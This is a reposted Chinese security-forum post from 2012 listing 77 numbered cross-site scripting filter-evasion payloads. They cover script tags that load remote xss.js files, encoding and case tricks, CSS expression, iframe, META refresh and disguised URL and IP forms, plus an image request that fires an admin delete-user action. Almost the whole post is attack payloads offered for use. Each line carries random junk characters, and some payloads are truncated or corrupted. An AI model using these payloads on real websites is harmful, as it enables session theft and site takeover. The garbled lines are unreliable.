貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
$ O' u, [7 w6 c2 d( h( ~7 p: e; g& o0 x3 R9 W( D" E, i, ~
(1)普通的XSS JavaScript注入! Y. u) V: R, y/ t6 u1 q
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>/ ?5 u7 Y0 u Z8 a3 m- v
5 S0 h; ]/ r# J5 a, G (2)IMG标签XSS使用JavaScript命令
, y0 y7 z! h8 e9 N <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT># D& {' t) i. M9 L
0 c8 v7 R" z, \9 Y (3)IMG标签无分号无引号% y a' |' D3 r6 w+ I; ?& l
<IMG SRC=javascript:alert(‘XSS’)>
) z7 Q( M. M% M2 H% f5 L
' C. P( N" ]' S( } (4)IMG标签大小写不敏感: ?' {; d# N/ b5 W3 Y
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>9 r4 E7 ^9 C1 r' s! U* {7 B- j; |
" a8 n- X; `/ b) b8 b) m9 l& K
(5)HTML编码(必须有分号)8 T/ f- _6 O1 u/ G/ z {
<IMG SRC=javascript:alert(“XSS”)>0 j1 Z: _3 U2 U' F) E7 |
" h# P- j0 T! A8 D. v
(6)修正缺陷IMG标签
, Z+ t; M- i# v* F, K <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
' {- D" f: a6 u- e2 d& @1 J
& ^' F2 }" g! V8 [) \ (7)formCharCode标签(计算器)
2 C7 H" w, F/ y! x' g3 W, v <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>: \! W W# o0 N7 [$ `( T
9 a( I: t# S" R e1 s2 E: r
(8)UTF-8的Unicode编码(计算器)
5 P7 M ^# W ~7 ~0 L. ^ <IMG SRC=jav..省略..S')>" n2 F Z* |- k
$ V l0 F. Q3 R% ^ B% \
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)- H9 f% H/ ~/ Z. q
<IMG SRC=jav..省略..S')>
! S! Y. Q5 R+ S7 {# i5 Z- v
/ m- |5 G! T# d E* k5 X+ I5 {# A& S E (10)十六进制编码也是没有分号(计算器)
- w4 [6 [7 r7 B; M$ a <IMG SRC=java..省略..XSS')>
2 c$ \( S: D% Z$ _- ^
: N/ Y+ m V- X (11)嵌入式标签,将Javascript分开2 M/ F# m4 P9 @4 M
<IMG SRC=”jav ascript:alert(‘XSS’);”>: K$ I3 U, z' Z
" m/ b: _* q2 [. U7 u3 K (12)嵌入式编码标签,将Javascript分开
t2 h8 `. w( N* p) P& i7 x <IMG SRC=”jav ascript:alert(‘XSS’);”>
8 B; j3 ]4 n( H; p
( W8 B; F1 F6 T, f7 F! y (13)嵌入式换行符 b0 A: B, D# E' ?% q
<IMG SRC=”jav ascript:alert(‘XSS’);”>$ Q% h3 [" v6 P+ t- H+ X) [
- s5 }1 a5 P3 M! u (14)嵌入式回车9 r# j. ^7 A2 q- L( L
<IMG SRC=”jav ascript:alert(‘XSS’);”>. P* O* f0 |6 W$ [
6 L, ~8 r" x3 ^0 c (15)嵌入式多行注入JavaScript,这是XSS极端的例子
- z$ [8 S' D0 o! q+ Q9 K: o* W <IMG SRC=”javascript:alert(‘XSS‘)”>
2 s0 g1 G4 Y- Y# D' o& j4 ` M! z7 q
(16)解决限制字符(要求同页面)
4 {( C- e& l, v3 ^8 D <script>z=’document.’</script>; E. r; k1 Z5 T0 ]; r; `8 l) m
<script>z=z+’write(“‘</script>
[: \1 {2 a/ N3 ?$ @# p <script>z=z+’<script’</script>
$ F: E. d) e& D <script>z=z+’ src=ht’</script>
7 d8 @' ?4 G/ a) c <script>z=z+’tp://ww’</script>
6 F# ^; ]; D0 r- c& k' t" P$ Y <script>z=z+’w.shell’</script>
/ s2 V% W& d! h+ C& Q <script>z=z+’.net/1.’</script>
$ {; G- ?, `: B4 c5 \# q/ j& s <script>z=z+’js></sc’</script>
3 \# h% X* F( X! e& t2 M- s <script>z=z+’ript>”)’</script># c' O+ |2 D9 s% ]! h# V
<script>eval_r(z)</script>, s2 }$ h! V5 t: J- a8 X
9 k6 B) w1 P [: J" E8 l
(17)空字符
5 t7 Z8 {" B% A; M: U perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
8 k" g2 K: H8 O' n+ m) L6 Q- O$ l6 M' F
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用4 z6 ^1 [ E# C) O( n! ?8 F
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
' }- A' I I* g* {6 |
. Y1 O: X: _. e% X/ O (19)Spaces和meta前的IMG标签( |" R) l% [: A! Z* h- ]
<IMG SRC=” � javascript:alert(‘XSS’);”>% _" y9 y8 O, ], v
0 \3 E) x' e' i. y. c l/ s. U) L0 | (20)Non-alpha-non-digit XSS) \% `; E. m* d. p- g
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>3 ]- u: u+ O0 `+ T) b
J+ i* z5 E: N
(21)Non-alpha-non-digit XSS to 2; j' ]1 G5 L$ Q/ J {* V* |6 j& ]
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
! V3 [0 _8 G7 U/ `
. L$ I7 {" A1 o (22)Non-alpha-non-digit XSS to 33 v; S( B8 E" z' H3 g
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
8 X2 V5 O5 m& }- l" p5 Y ~' d; K7 s; W" I
(23)双开括号+ m) O( I, E. w) W8 l
<<SCRIPT>alert(“XSS”);//<</SCRIPT>* y0 ?, J; I1 s% x5 I( I7 ]% ~
& p- q& S. ?# L- ~ (24)无结束脚本标记(仅火狐等浏览器)
8 {4 `+ z) a* t( \1 w, t$ p <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
9 U% l+ y/ l. X3 ^9 N% C4 l2 X; Y8 Y9 U8 O$ B( ]
(25)无结束脚本标记2
) @' g! L3 T- t# g* S7 t( x6 ] <SCRIPT SRC=//3w.org/XSS/xss.js>
* S' B- Z: \; ]9 \) N7 `% [8 {; y/ ~& B- x! o
(26)半开的HTML/JavaScript XSS
( r# t3 C! {1 o0 m% `- ~0 H/ V- t% ` <IMG SRC=”javascript:alert(‘XSS’)”: t; c* H- I: q- \6 C
: \5 Y) R" ^# F1 k (27)双开角括号
& X( M D' W. P6 `. O( U9 o7 _ <iframe src=http://3w.org/XSS.html <
# V$ v! n$ ]9 y
0 l1 T m% d, _0 Z8 I (28)无单引号 双引号 分号. V" @% i: f; n0 N1 ]7 D
<SCRIPT>a=/XSS/
9 V4 `3 _7 @) f. {% x alert(a.source)</SCRIPT>& B* ~- k* p) X
9 _, {# y2 _5 ]4 M( U! A
(29)换码过滤的JavaScript$ Y! }) [5 J5 t: }/ L
\”;alert(‘XSS’);//+ A7 [4 e: @, E. t
& \6 i/ l+ a' X# h. ? (30)结束Title标签" j( ^5 V" g" M. l; ^
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
! c6 @) k' Q- V1 d
- }9 h) q( G8 ~8 O- k5 G (31)Input Image3 l! d- q9 K: f, r N/ `7 w
<INPUT SRC=”javascript:alert(‘XSS’);”>
$ B4 C6 ]' }4 O' ?9 L# k3 j1 j) w% o: r6 Q+ F1 |
(32)BODY Image: r# S& @7 v- T+ z
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
6 V8 N0 N2 _, b6 i1 t3 L" V$ O# O; o" Z' [6 O
(33)BODY标签+ G3 J$ q; V. x6 V1 n ~" X
<BODY(‘XSS’)>) a' e* y/ ?! M- \! t
4 a T2 Q9 {3 t* P' J! S
(34)IMG Dynsrc' A8 g1 ~8 @+ Y* K$ J L) ^" E' Z
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
1 i& N6 P: `/ ^1 Q8 y1 @8 i% c" s
(35)IMG Lowsrc
- e2 S1 y! F0 c <IMG LOWSRC=”javascript:alert(‘XSS’)”>( R$ Z' g( B9 [/ H5 e
, { i. a# h, p) ~& K
(36)BGSOUND
9 A8 C) G- V( Z, i4 o <BGSOUND SRC=”javascript:alert(‘XSS’);”>
0 N4 @& T) N6 A3 `
3 t( B: D' V- s! o I6 J (37)STYLE sheet
: }, P0 h3 u( n% w0 n <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
% t; s: M) Y7 {# ^
' N$ q+ \0 M* W1 G (38)远程样式表
, @4 _: t8 i! i$ ], u <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>% W# {6 p. a. H
/ Q2 H* [8 B& | (39)List-style-image(列表式)
6 m N9 \; _- h V& [6 N <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS) P' D0 ]. \' H9 y
- C2 O0 o6 a& G) q, n; ]
(40)IMG VBscript
# a% ], ^0 B& g1 D" e% f' Z1 E6 D <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
4 Q# @9 t6 ~; { {9 G% q: b# H# j6 T* f4 @ b1 L# z
(41)META链接url
+ t& J( F# }/ Y, E+ Q9 k <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>; n. `! q# N7 [8 W. t7 U. u
& C2 O# M5 m8 ~: W (42)Iframe( d- x6 g' x8 W( |% _4 L
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>! a; d: n; r- ?% L) \
# r8 A0 w0 E# H9 k# h4 _ (43)Frame
+ N6 ~! ]5 g$ S3 D4 Q0 _ <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
6 L8 h9 x! x* k' o* F* i; e9 i. d+ B9 Q( l1 Y% `
(44)Table5 h& I: {5 t! ?1 a
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
1 s' _8 K' |1 Z. z& O9 b. ]) ^6 ^ \! L8 ~
(45)TD( Q1 F) E% l# k: g/ [. J
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>- n _" G+ C8 z7 B
* ^- r# A! y" K+ c3 m4 x! f% k (46)DIV background-image
& } [9 U- o3 R4 k, i$ @" j <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>$ N0 w& }) u _/ R/ j* D9 m7 G
( [2 I) `6 `6 y: i" T- c0 t
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
& i4 S# p3 f [- q* T7 O& r- d x <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>- _ @1 q* ?3 O
+ e. u$ ~/ [5 Q8 [
(48)DIV expression
2 r/ A* u3 ?- N# I$ e* h! B0 j <DIV STYLE=”width: expression_r(alert(‘XSS’));”>" L7 t! D7 J* }1 h* M0 f4 e. P
7 v+ S' a O2 Q6 U! e3 x
(49)STYLE属性分拆表达
. ?9 ~6 ?0 W1 y" C& P9 P& Q4 w+ C# |% A <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
/ v* \- c' K/ N; J; z3 m6 c
) o' I. b, h6 K j! p$ }, f (50)匿名STYLE(组成:开角号和一个字母开头)
9 e) t3 n. R! b4 @ <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>/ ?1 ]2 {' H0 n
) _/ g4 p2 ?1 a4 Q5 x/ O
(51)STYLE background-image; ~, F o& q& j, B3 E
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>, q4 y2 F- Y" a4 _
$ C D, P# I! R% C (52)IMG STYLE方式
* j6 f; a9 o( B exppression(alert(“XSS”))’>
+ S2 O. h/ L/ \) `' @
! s3 I J7 I. Z f (53)STYLE background
- W9 K1 w. L' C; Z. P+ C) e <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>* J; J1 \# F0 K; U5 y5 \
1 u. U8 p }' g4 M (54)BASE. x4 X7 ~5 |) v3 {
<BASE HREF=”javascript:alert(‘XSS’);//”>0 j" B5 }! f4 [8 W$ H
- }6 u( i$ }& ?5 q9 `
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
! ^9 N& F; A+ K7 G: ], T <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>! z, _: u( i) h3 H( g
2 ^1 X- D2 n% x9 k4 V% W
(56)在flash中使用ActionScrpt可以混进你XSS的代码2 A) q- s3 \& z2 L
a=”get”;
O5 D$ K1 j2 q. v& C5 ]3 j b=”URL(\”";2 D5 K7 L# O2 Z6 F
c=”javascript:”;
$ T6 e& z- i/ w) v/ } d=”alert(‘XSS’);\”)”;4 w0 M8 K. f4 S7 f* H
eval_r(a+b+c+d);
3 a1 y* i! M" M+ s/ n
; \. A* E/ D$ x) d- x$ N (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上2 e! Q# {$ M4 u' D: a
<HTML xmlns:xss>0 V4 P, z$ f. `- c1 B& ~; J
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>4 c5 ~ K+ m; u' ?* p7 ?! K
<xss:xss>XSS</xss:xss>
! M/ f. B! H; g0 C# O2 v# g) w1 y; n </HTML>) @! q) t2 Y! A: g
- w% u! P- S# P( s# S! A X* S! S
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用 U7 P2 c8 b( z/ i6 z" A* Z
<SCRIPT SRC=””></SCRIPT>
- f1 O/ T7 a, \8 H0 N/ _) e7 [3 ?& c, s0 q% o1 P) r( }
(59)IMG嵌入式命令,可执行任意命令; q3 [1 w; E! a, W' _5 i
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
2 G1 @2 D$ Z2 G7 I! i; [. g0 c: H/ O7 r- J2 G; z. C4 `, [
(60)IMG嵌入式命令(a.jpg在同服务器)0 l/ p6 t" c- ^9 ~# e
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
9 M5 Z8 f3 C% Z/ t8 L
+ B4 ^+ b' D+ T5 i8 o6 l: Z (61)绕符号过滤 y; d4 i* a# T! A9 ]
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>( Y3 v: `% B. \' w
2 \5 j2 ?( U) u8 p p* t \' N
(62): `/ p% I, J5 H5 r) B, n* N
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>: ]5 J4 ?, h7 ?$ I |8 q) e+ l
% }# Q2 Q# {' a4 x# d2 ] (63)
# s. T& k, T( @ c <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>3 o z# L8 D7 h# y1 d. n
' @$ X* _& R8 D! N {$ [3 N3 [6 g (64)
4 {2 V( E1 j |% H. n S- e* Y& K <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
3 ^6 J6 c# l+ \$ [7 ^; M5 n% F2 w3 S) c S, o7 ~& N
(65)0 z, w$ p7 ?: _) S1 W; e( @( e9 l' n& W
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
5 B; Y7 v5 U) f5 P; a# `* Q
* \: q u6 R# o! G, a (66)5 L! D! \, F! K) E% o$ y* y
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>) f3 ?7 R& A2 S8 Q. e, ^
/ O6 Q. r7 Y5 u: d! ~
(67)
3 }1 r& ~0 E/ V! G' g <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>; ~! u6 b( q' G% L' Q5 A
6 I* y: [0 z2 o$ c$ X (68)URL绕行& F% D; O0 l; K
<A HREF=”http://127.0.0.1/”>XSS</A>
# H( c' Q+ w6 |4 G9 Q+ p
/ |3 p, D/ E( |% {0 N0 | (69)URL编码
& z* C, Y' E6 W8 P' Z) H% w <A HREF=”http://3w.org”>XSS</A>& `' \/ Y h0 O6 ?
( K& H1 r$ G( ~2 y9 x5 c
(70)IP十进制3 s1 u7 `( ^9 m
<A HREF=”http://3232235521″>XSS</A>
! k) @: w' j% n9 t& N( o3 z. g# h2 t
(71)IP十六进制8 Y5 m4 X1 o$ o. W5 R
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>! y4 ^/ p3 @7 Y( Z& D4 P( C
* j M5 D: |; ^4 { `
(72)IP八进制 M1 a4 G9 `' R
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
4 ~( p/ x, f# i6 ^& K8 u$ R3 X' T. W! S. I$ G, q
(73)混合编码# q& A: m Z9 ~" e8 e
<A HREF=”h
- C, o V5 m/ r* a0 K5 F# V- e tt p://6 6.000146.0×7.147/”">XSS</A>9 f5 [0 a) W( q4 }% w! J
& A2 x( ^) M3 s3 j2 u& y
(74)节省[http:]( q( p* h/ }$ y! Q j" ~
<A HREF=”//www.google.com/”>XSS</A>7 R9 Y" X7 `: n `. C
( F/ R! y: c6 c7 O/ O* ]6 {- u (75)节省[www]
- {* f1 l6 d# U3 ~; T7 } <A HREF=”http://google.com/”>XSS</A>4 V) a+ t, y% n+ S& o1 D( f
( x- x$ R) E" D |7 ?
(76)绝对点绝对DNS
8 k9 J; D* k2 g0 t# _( M0 y <A HREF=”http://www.google.com./”>XSS</A>
$ h+ k1 n' Q* q3 g9 Z0 t. b
& u* U1 u, K5 u (77)javascript链接
. R3 b! B2 W! e) W <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对